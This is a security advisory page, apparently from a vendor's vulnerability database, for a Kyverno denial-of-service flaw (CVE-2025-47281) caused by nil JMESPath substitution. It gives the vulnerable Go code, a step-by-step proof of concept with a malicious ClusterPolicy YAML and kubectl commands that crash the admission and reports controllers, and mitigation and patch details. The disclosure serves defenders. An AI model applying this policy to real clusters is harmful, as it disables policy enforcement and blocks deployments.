Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
🐹 Go

GHSA-r5p3-955p-5ggq

HIGH

Kyverno's Improper JMESPath Variable Evaluation Lead to Denial of Service

Also known asBIT-kyverno-2025-47281CVE-2025-47281GO-2025-3823
Published
Jul 22, 2025
Updated
Feb 4, 2026
Affected
1 pkg
Patched
1 / 1
Exploits
None indexed

EPSS Exploitation Probability

via FIRST.org ↗
0.5%probability of exploitation in next 30 days
Lower Risk37th percentile+0.35%
0.00%0.33%0.65%0.97%0.1%0.5%Dec 25Apr 26Jun 26

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

Blast Radius

1 pkg affected
🐹github.com/kyverno/kyverno

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects Go packages — download data is not available via public APIs for these ecosystems.

Description

Summary

A Denial of Service (DoS) vulnerability exists in Kyverno due to improper handling of JMESPath variable substitutions. Attackers with permissions to create or update Kyverno policies can craft expressions using the {{@}} variable combined with a pipe and an invalid JMESPath function (e.g., {{@ | non_existent_function }}).

This leads to a nil value being substituted into the policy structure. Subsequent processing by internal functions, specifically getValueAsStringMap, which expect string values, results in a panic due to a type assertion failure (interface {} is nil, not string). This crashes Kyverno worker threads in the admission controller (and can lead to full admission controller unavailability in Enforce mode) and causes continuous crashes of the reports controller pod, leading to service degradation or unavailability."

Details

The vulnerability lies in the getValueAsStringMap function within pkg/engine/wildcards/wildcards.go (specifically around line 138):

func getValueAsStringMap(key string, data interface{}) (string, map[string]string) {
    // ...
    valMap, ok := val.(map[string]interface{}) // val can be the map containing the nil value
    // ...
    for k, v := range valMap { // If valMap contains a key whose value is nil...
        result[k] = v.(string) // PANIC: v.(string) on a nil interface{}
    }
    return patternKey, result
}

When a policy contains a variable like {{@ | foo}} (where foo is not a defined JMESPath function), the JMESPath evaluation within Kyverno's variable substitution logic results in a nil value. This nil is then assigned to the corresponding field in the policy pattern (e.g., a label value).

During policy processing, ExpandInMetadata calls expandWildcardsInTag, which in turn calls getValueAsStringMap. If the data argument to getValueAsStringMap (derived from the policy pattern) contains this nil value where a string is expected, the type assertion v.(string) panics when v is nil.

Proof of Concept (PoC)

This proof of concept consists of two phases. First a malicious policy is inserted with the default validation failure action, which is Audit. In this phase the reports controller will end up in a crash loop. The admission controller will print out a similar stack trace, but only a worker crashes. The admission controller process does not crash.

In the second phase the same policy is inserted with the Enforce validation failure action. In this scenario both admission controller and the reports controller end up in a crash loop. As the admission controller crashes on incoming admission requests, it effectively makes it impossible to deploy new resources.

Tested on Kyverno v1.14.1.

  1. Prerequisites: Kubernetes cluster with Kyverno installed. Attacker has permissions to create/update ClusterPolicy or Policy resources.

  2. Create a Malicious Policy: Apply the following ClusterPolicy:

    apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
    name: dos-via-jmespath-nil
spec:
    rules:
    - name: trigger-nil-panic
      match:
        any:
        - resources:
            kinds:
            - Pod
      validate:
          message: "DoS attempt via JMESPath nil substitution"
          pattern:
            metadata:
              labels:
                # '{{@ | non_existent_function}}' will result in a nil value for this label.
                # This nil value causes a panic in getValueAsStringMap.
                trigger_panic: "{{@ | non_existent_function}}"

  3. Verify the policy status: Make sure the policy is ready.

    k get clusterpolicy dos-via-jmespath-nil
NAME                   ADMISSION   BACKGROUND   READY   AGE   MESSAGE
dos-via-jmespath-nil   true        true         True    24m   Ready

  4. Trigger the Policy: Create any Pod in any namespace (if not further restricted by match or exclude):

    kubectl run test-pod-dos --image=nginx

  5. Observe Crashes:

  6. Reset: Delete the existing policy with kubectl delete clusterpolicy dos-via-jmespath-nil and delete the test pod with kubectl delete pod test-pod-dos. Then apply the following:

     apiVersion: kyverno.io/v1
 kind: ClusterPolicy
 metadata:
     name: dos-via-jmespath-nil-enforce
 spec:
     validationFailureAction: Enforce # This has changed
     rules:
     - name: trigger-nil-panic
       match:
         any:
         - resources:
             kinds:
             - Pod
       validate:
           message: "DoS attempt via JMESPath nil substitution"
           pattern:
             metadata:
               labels:
                 # '{{@ | non_existent_function}}' will result in a nil value for this label.
                 # This nil value causes a panic in getValueAsStringMap.
                 trigger_panic: "{{@ | non_existent_function}}"

  7. Trigger the Policy (again): Create any Pod in any namespace (if not further restricted by match or exclude):

    kubectl run test-pod-dos --image=nginx

    The command returns the following error:

    Error from server (InternalError): Internal error occurred: failed calling webhook "validate.kyverno.svc-fail": failed to call webhook: Post "https://kyverno-svc.kyverno.svc:443/validate/fail?timeout=10s": EOF

  8. Observe Crashes:

    • Check Kyverno admission controller logs for container panic. Notice that the whole controller has crashed, not just a worker.
    • Check Kyverno reports controller logs; the pod crashes and restarts.

Impact

This is a Denial of Service (DoS) vulnerability.

  • Affected Components:

    • Kyverno Admission Controller: In Audit mode, individual worker threads handling admission requests will panic and terminate. While the main pod uses a worker pool and can recover by spawning new workers, repeated exploitation can degrade performance or lead to worker pool exhaustion. In Enforce mode, the whole controller panics. This makes all related admission requests fail.
    • Kyverno Reports Controller: The entire controller pod will panic and crash, requiring a restart by Kubernetes. This halts background policy scanning and report generation.

  • Conditions: An attacker needs permissions to create or update Kyverno Policy or ClusterPolicy resources. This is often a privileged operation but may be delegated in some environments.

  • Consequences: Degraded policy enforcement, inability to create/update resources, and loss of policy reporting visibility.

Mitigation

  • Add robust nil handling in getValueAsStringMap.
  • Look into adding graceful error handling in JMESPath substitution. Prevent evaluation errors (like undefined functions) from resulting in nil values.

Affected Packages

1 total 1 fixed
EcosystemPackageVulnerable rangeFix
🐹Gogithub.com/kyverno/kyvernoall versions1.14.2

Detection & mitigation playbook

Open-source dependency

  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for github.com/kyverno/kyverno. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

  2. Fix

    Update github.com/kyverno/kyverno to 1.14.2 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-r5p3-955p-5ggq is resolved across your whole dependency graph.

  3. Workarounds

    If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

  4. How O3 protects you

    O3 pinpoints whether GHSA-r5p3-955p-5ggq is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-r5p3-955p-5ggq. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

### Summary A Denial of Service (DoS) vulnerability exists in Kyverno due to improper handling of JMESPath variable substitutions. Attackers with permissions to create or update Kyverno policies can craft expressions using the `{{@}}` variable combined with a pipe and an invalid JMESPath function (e.g., `{{@ | non_existent_function }}`). This leads to a `nil` value being substituted into the policy structure. Subsequent processing by internal functions, specifically `getValueAsStringMap`, which expect string values, results in a panic due to a type assertion failure (`interface {} is nil, not
O3 Security · Impact-Aware SCA

Is GHSA-r5p3-955p-5ggq in your dependencies?

O3 detects GHSA-r5p3-955p-5ggq across Go dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.

Scan my dependencies How O3 SCA works